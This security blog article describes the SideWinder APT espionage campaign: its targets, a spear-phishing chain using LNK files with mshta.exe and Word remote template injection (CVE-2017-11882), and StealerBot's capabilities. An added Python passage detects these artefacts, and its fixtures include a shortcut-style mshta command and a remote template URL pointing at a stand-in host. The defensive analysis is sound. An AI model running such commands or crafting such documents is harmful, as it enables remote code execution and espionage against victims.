
SideWinder APT Attacks Entities In Middle East And Africa

by Wajahat Raja

October 29, 2024 - TuxCare expert team

Recent reports have claimed that an advanced persistent threat (APT) group with ties to India has launched multiple attacks in the Middle East and Africa. The threat actor group, referred to as the SideWinder APT, has mainly targeted high-profile entities. In this article, we’ll dive into the attacks and uncover the exploited flaws. Let’s begin!

The SideWinder APT Attack Group Unveiled  

Before diving into the details of the group, it’s worth mentioning that the SideWinder APT threat actor goes by multiple names, including APT-C-17, Baby Elephant, Hardcore Nationalist, Leafperforator, Rattlesnake, Razor Tiger, and T-APT-04. Providing further insight into the threat actor, cybersecurity researchers from Kaspersky have stated that:

“The group may be perceived as a low-skilled actor due to the use of public exploits, malicious LNK files and scripts as infection vectors, and the use of public RATs, but their true capabilities only become apparent when you carefully examine the details of their operations.”

As per recent reports, the SideWinder APT has targeted various sectors in multiple countries that include: 

Sectors:
  • Government
  • Military entities
  • Logistics infrastructure
  • Telecommunications companies
  • Financial institutions
  • Universities
  • Oil trading companies

Countries:
  • Bangladesh
  • Djibouti
  • Jordan
  • Malaysia
  • The Maldives
  • Myanmar
  • Nepal
  • Pakistan
  • Saudi Arabia
  • Sri Lanka
  • Turkey
  • U.A.E.

Apart from these targets, the threat actors have also been observed targeting diplomatic entities pertaining to Afghanistan, France, China, India, Indonesia, and Morocco.

Details Of The Attack Campaign 

One of the key aspects of the SideWinder APT attack campaigns is their use of a multi-stage infection chain designed to deliver a post-exploitation toolkit called StealerBot. Attacks orchestrated by the SideWinder APT group start with a spear-phishing email carrying one of the two payloads below.

  1. A ZIP archive with a Windows shortcut (LNK) file.
  2. A Microsoft Word document.

Either payload is used to execute JavaScript and .NET downloaders that ultimately deploy the StealerBot malware. The Word document relies on remote template injection and exploits CVE-2017-11882, while the LNK file uses the mshta.exe utility to run JavaScript code.
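The two delivery payloads described above each leave a checkable artefact on the defender's side: a Word document that pulls a remote template carries an external attachedTemplate relationship in its OOXML package, and a shortcut that abuses mshta.exe shows up as an mshta.exe process launched straight from the user's shell. The following is an added example, not code from the article or from Kaspersky, showing both checks in Python. The .docx it inspects and the process-creation events it scans are constructed inline for illustration; the mshta heuristic (spawned by explorer.exe or given a URL argument) is an assumption for this example, not a published vendor rule.

```python
"""Triage helpers for the two SideWinder delivery artefacts: remote-template
Word documents and mshta.exe launched from a shortcut (added example)."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# OOXML relationship type that Word uses for an attached (possibly remote) template.
ATTACHED_TEMPLATE_REL = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"


def find_remote_templates(docx_bytes):
    """Return the external attachedTemplate targets in a .docx (empty list if none).

    A benign document usually has no word/_rels/settings.xml.rels at all, or an
    attachedTemplate pointing at a local .dotm. An External target means Word
    will fetch (and execute macros from) a template hosted elsewhere on open.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if "word/_rels/settings.xml.rels" not in zf.namelist():
            return hits
        root = ET.fromstring(zf.read("word/_rels/settings.xml.rels"))
        for rel in root.iter(f"{{{REL_NS}}}Relationship"):
            if (rel.get("Type") == ATTACHED_TEMPLATE_REL
                    and rel.get("TargetMode") == "External"):
                hits.append(rel.get("Target", ""))
    return hits


def build_sample_docx(template_target=None):
    """Constructed minimal .docx for testing; only the parts the checker reads exist."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        if template_target is not None:
            zf.writestr(
                "word/_rels/settings.xml.rels",
                f'<Relationships xmlns="{REL_NS}">'
                f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE_REL}" '
                f'Target="{template_target}" TargetMode="External"/>'
                "</Relationships>",
            )
    return buf.getvalue()


MSHTA_RE = re.compile(r"(^|\\)mshta\.exe$", re.IGNORECASE)
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def suspicious_mshta(events):
    """Return command lines of mshta.exe launches worth a look.

    Heuristic (assumption for this example): mshta spawned directly by
    explorer.exe (a double-clicked shortcut) or handed a URL as its argument.
    """
    flagged = []
    for ev in events:
        if not MSHTA_RE.search(ev["image"]):
            continue
        from_explorer = ev["parent"].lower().endswith("\\explorer.exe")
        if from_explorer or URL_RE.search(ev["cmdline"]):
            flagged.append(ev["cmdline"])
    return flagged


# Constructed process-creation events in the style of a Sysmon/EDR feed.
# These are illustrative, not real telemetry from the campaign.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/p"},          # shortcut-style launch
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Tools\inventory.hta"},           # local admin HTA
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},                                 # unrelated process
]

if __name__ == "__main__":
    print(find_remote_templates(build_sample_docx("http://example.invalid/t.dotm")))
    print(suspicious_mshta(SAMPLE_EVENTS))
```

The document check is cheap enough to run on every inbound attachment at the mail gateway, and the process check maps directly onto a SIEM rule over process-creation events; neither needs the downloader or StealerBot itself to be present, which is the point of catching the chain at its first stage.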

As of now, media reports have stated that the end goal of the SideWinder APT attacks is to aid espionage by fetching plugins that can be used for various malicious activities, such as:

  • Installing additional malware.
  • Acquiring screenshots.
  • Logging keystrokes.
  • Stealing passwords and files.
  • Intercepting RDP credentials.
  • Starting a reverse shell.
  • Phishing Windows credentials.
  • Escalating privileges.

Conclusion 

The SideWinder APT group’s sophisticated multi-stage attacks highlight its evolving capabilities in espionage and cyber warfare. By targeting high-profile sectors and leveraging tools like StealerBot, the group poses a significant threat to global cybersecurity, requiring vigilant defenses and advanced countermeasures to mitigate its impact.

The sources for this piece include articles in The Hacker News and Kaspersky.
